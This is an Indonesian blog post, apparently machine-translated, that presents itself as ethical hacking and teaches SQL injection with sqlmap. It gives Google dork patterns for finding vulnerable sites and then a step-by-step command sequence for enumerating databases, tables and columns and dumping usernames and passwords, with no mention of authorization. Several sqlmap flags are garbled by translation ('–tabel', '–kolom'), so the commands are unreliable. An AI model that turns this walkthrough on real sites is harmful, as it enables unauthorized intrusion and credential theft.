Apa itu Sql Injeksi? Bagaimana cara menggunakannya.

  • Whatsapp
Apa itu Sql Injeksi?  Bagaimana cara menggunakannya.
Apa itu Sql Injeksi Bagaimana cara menggunakannya

News.nextcloud.asia

Hai teman-teman, kami kembali dengan posting peretasan etis lainnya di mana kami akan menunjukkan kepada Anda apa itu Sql Injection dan bagaimana peretas atau penyerang menggunakannya untuk meretas situs web. Jadi tanpa membuang waktu lagi mari kita mulai.

Injeksi Sql: –

Injeksi kode yang digunakan untuk mengeksploitasi kerentanan SQL (Structured Query Language). Ketika kesalahan ditemukan di SQL situs web. Ini pada dasarnya adalah kerentanan sisi server. Untuk mengeksploitasi jenis kerentanan ini, SqlMap digunakan oleh peretas atau penguji pena.

Penggunaan :-

Pertama-tama kita perlu mencari tahu situs web yang rentan terhadap sql. Kami dapat menemukan web yang rentan terhadap sql dengan bantuan yang diberikan google dorks.

  • login.php?id=4
  • admin.php?id =4
  • index.php?id = 4

https://www.youtube.com/watch?v=bB1KFRCv2SE

Dan masih banyak lagi ini adalah beberapa contohnya. Kami menggunakan http://www.example.com/php?id=7 untuk tujuan demo.

$ ./sqlmap.py -u “http://www.example.com/php?id=7” –dbs

Sekarang tunggu hingga pemindaian selesai dan tampilkan tabel database.

$ ./sqlmap.py -u “http://www.example.com/php?id=7” -D nama tabel –tabel

Daftar kolom dalam tabel database menunjukkan.

$ ./sqlmap.py -u “http://www.example.com/php?id=7” -D nama tabel -T nama kolom –kolom

Sekarang daftar nama pengguna, kata sandi, informasi, dll. ditampilkan di antarmuka.

$ ./sqlmap.py -u “http://www.example.com/php?id=7” -D nama tabel -T nama kolom -C nama kolom –dump

Sekarang semua data yang diunduh pada perangkat Anda sebagai file txt.

Jadi itu saja yang dapat Anda pelajari lebih lanjut tentang sqlmap itu hanya hal dasar dan saya harap kalian sangat menikmati ini dan menemukan informasi untuk Anda. Terima kasih atas kunjungannya semoga harimu menyenangkan.

Mohit Saran (Raja Peretas)

Pos terkait

Tinggalkan Balasan

Alamat email Anda tidak akan dipublikasikan.